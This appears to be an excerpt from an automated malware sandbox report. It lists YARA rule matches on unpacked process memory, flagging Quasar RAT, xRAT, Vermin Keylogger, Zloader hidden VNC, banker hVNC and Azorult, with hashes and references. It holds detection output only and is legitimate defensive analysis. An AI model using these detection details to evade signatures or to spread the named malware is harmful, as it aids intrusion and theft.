                      Source: 10.3.SystemPropertiesPerformance.exe.1924408.0.raw.unpack, type: UNPACKEDPEMatched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
                      Source: 1.2.CVbJSUXraQ.exe.ee5bac.2.raw.unpack, type: UNPACKEDPEMatched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 1.2.CVbJSUXraQ.exe.ee5bac.2.raw.unpack, type: UNPACKEDPEMatched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 1.2.CVbJSUXraQ.exe.ee5bac.2.raw.unpack, type: UNPACKEDPEMatched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
                      Source: 1.2.CVbJSUXraQ.exe.ee5bac.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
                      Source: 1.2.CVbJSUXraQ.exe.ee5bac.2.raw.unpack, type: UNPACKEDPEMatched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 1.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPEMatched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
                      Source: 1.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPEMatched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 1.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPEMatched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 1.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPEMatched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
                      Source: 1.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
                      Source: 1.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPEMatched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 1.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPEMatched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
                      Source: 5.2.svchost.exe.c60000.0.unpack, type: UNPACKEDPEMatched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
                      Source: 5.2.svchost.exe.c60000.0.unpack, type: UNPACKEDPEMatched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
                      Source: 4.0.vnc.exe.ab6000.1.raw.unpack, type: UNPACKEDPEMatched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
                      Source: 4.0.vnc.exe.ab6000.1.raw.unpack, type: UNPACKEDPEMatched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
                      Source: 5.0.svchost.exe.c60000.3.unpack, type: UNPACKEDPEMatched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
                      Source: 5.0.svchost.exe.c60000.3.unpack, type: UNPACKEDPEMatched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
                      Source: 10.3.SystemPropertiesPerformance.exe.14d0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
                      Source: 7.2.CVbJSUXraQ.exe.f14fac.2.raw.unpack, type: UNPACKEDPEMatched rule: Vermin_Keylogger_Jan18_1 date = 2018-01-29, hash5 = 24956d8edcf2a1fd26805ec58cfd1ee7498e1a59af8cc2f4b832a7ab34948c18, hash4 = 4c5e019e0e55a3fe378aa339d52c235c06ecc5053625a5d54d65c4ae38c6e3da, hash3 = 0157b43eb3c20928b77f8700ad8eb279a0aa348921df074cd22ebaff01edaae6, hash2 = e1d917769267302d58a2fd00bc49d4aee5a472227a75f9366b46ce243e9cbef7, hash1 = 74ba162eef84bf13d1d79cb26192a4692c09fed57f321230ddb7668a88e3935d, author = Florian Roth, description = Detects Vermin Keylogger, hash6 = 2963c5eacaad13ace807edd634a4a5896cb5536f961f43afcf8c1f25c08a5eef, reference = https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 7.2.CVbJSUXraQ.exe.f14fac.2.raw.unpack, type: UNPACKEDPEMatched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
                      Source: 7.2.CVbJSUXraQ.exe.f14fac.2.raw.unpack, type: UNPACKEDPEMatched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 7.2.CVbJSUXraQ.exe.f14fac.2.raw.unpack, type: UNPACKEDPEMatched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 7.2.CVbJSUXraQ.exe.f14fac.2.raw.unpack, type: UNPACKEDPEMatched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
                      Source: 7.2.CVbJSUXraQ.exe.f14fac.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
                      Source: 7.2.CVbJSUXraQ.exe.f14fac.2.raw.unpack, type: UNPACKEDPEMatched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 7.2.CVbJSUXraQ.exe.f14fac.2.raw.unpack, type: UNPACKEDPEMatched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
                      Source: 10.3.SystemPropertiesPerformance.exe.5ce01cc.5.raw.unpack, type: UNPACKEDPEMatched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 10.3.SystemPropertiesPerformance.exe.5ce01cc.5.raw.unpack, type: UNPACKEDPEMatched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 10.3.SystemPropertiesPerformance.exe.5ce01cc.5.raw.unpack, type: UNPACKEDPEMatched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
                      Source: 10.3.SystemPropertiesPerformance.exe.5ce01cc.5.raw.unpack, type: UNPACKEDPEMatched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
                      Source: 10.3.SystemPropertiesPerformance.exe.5ce01cc.5.raw.unpack, type: UNPACKEDPEMatched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                      Source: 10.3.SystemPropertiesPerformance.exe.5ce45cc.6.raw.unpack, type: UNPACKEDPEMatched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
                      Source: 10.3.SystemPropertiesPerformance.exe.5ce45cc.6.raw.unpack, type: UNPACKEDPEMatched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.3.SystemPropertiesPerformance.exe.5ce45cc.6.raw.unpack, type: UNPACKEDPE; Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.3.SystemPropertiesPerformance.exe.5ce45cc.6.raw.unpack, type: UNPACKEDPE; Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 10.3.SystemPropertiesPerformance.exe.5ce45cc.6.raw.unpack, type: UNPACKEDPE; Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 10.3.SystemPropertiesPerformance.exe.5ce45cc.6.raw.unpack, type: UNPACKEDPE; Matched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.3.SystemPropertiesPerformance.exe.5ce45cc.6.raw.unpack, type: UNPACKEDPE; Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 10.3.SystemPropertiesPerformance.exe.18f9408.1.raw.unpack, type: UNPACKEDPE; Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 10.3.SystemPropertiesPerformance.exe.18f9408.1.raw.unpack, type: UNPACKEDPE; Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 1.3.CVbJSUXraQ.exe.1833408.5.raw.unpack, type: UNPACKEDPE; Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 1.3.CVbJSUXraQ.exe.1833408.5.raw.unpack, type: UNPACKEDPE; Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 1.0.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE; Matched rule: Vermin_Keylogger_Jan18_1 date = 2018-01-29, hash5 = 24956d8edcf2a1fd26805ec58cfd1ee7498e1a59af8cc2f4b832a7ab34948c18, hash4 = 4c5e019e0e55a3fe378aa339d52c235c06ecc5053625a5d54d65c4ae38c6e3da, hash3 = 0157b43eb3c20928b77f8700ad8eb279a0aa348921df074cd22ebaff01edaae6, hash2 = e1d917769267302d58a2fd00bc49d4aee5a472227a75f9366b46ce243e9cbef7, hash1 = 74ba162eef84bf13d1d79cb26192a4692c09fed57f321230ddb7668a88e3935d, author = Florian Roth, description = Detects Vermin Keylogger, hash6 = 2963c5eacaad13ace807edd634a4a5896cb5536f961f43afcf8c1f25c08a5eef, reference = https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.0.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE; Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 1.0.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE; Matched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.0.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE; Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.0.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE; Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 1.0.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE; Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 1.0.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE; Matched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.0.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE; Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 10.2.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE; Matched rule: Vermin_Keylogger_Jan18_1 date = 2018-01-29, hash5 = 24956d8edcf2a1fd26805ec58cfd1ee7498e1a59af8cc2f4b832a7ab34948c18, hash4 = 4c5e019e0e55a3fe378aa339d52c235c06ecc5053625a5d54d65c4ae38c6e3da, hash3 = 0157b43eb3c20928b77f8700ad8eb279a0aa348921df074cd22ebaff01edaae6, hash2 = e1d917769267302d58a2fd00bc49d4aee5a472227a75f9366b46ce243e9cbef7, hash1 = 74ba162eef84bf13d1d79cb26192a4692c09fed57f321230ddb7668a88e3935d, author = Florian Roth, description = Detects Vermin Keylogger, hash6 = 2963c5eacaad13ace807edd634a4a5896cb5536f961f43afcf8c1f25c08a5eef, reference = https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.2.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE; Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 10.2.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE; Matched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.2.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE; Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.2.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE; Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 10.2.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE; Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 10.2.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE; Matched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.2.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE; Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 7.0.CVbJSUXraQ.exe.f14fac.3.raw.unpack, type: UNPACKEDPE; Matched rule: Vermin_Keylogger_Jan18_1 date = 2018-01-29, hash5 = 24956d8edcf2a1fd26805ec58cfd1ee7498e1a59af8cc2f4b832a7ab34948c18, hash4 = 4c5e019e0e55a3fe378aa339d52c235c06ecc5053625a5d54d65c4ae38c6e3da, hash3 = 0157b43eb3c20928b77f8700ad8eb279a0aa348921df074cd22ebaff01edaae6, hash2 = e1d917769267302d58a2fd00bc49d4aee5a472227a75f9366b46ce243e9cbef7, hash1 = 74ba162eef84bf13d1d79cb26192a4692c09fed57f321230ddb7668a88e3935d, author = Florian Roth, description = Detects Vermin Keylogger, hash6 = 2963c5eacaad13ace807edd634a4a5896cb5536f961f43afcf8c1f25c08a5eef, reference = https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.0.CVbJSUXraQ.exe.f14fac.3.raw.unpack, type: UNPACKEDPE; Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
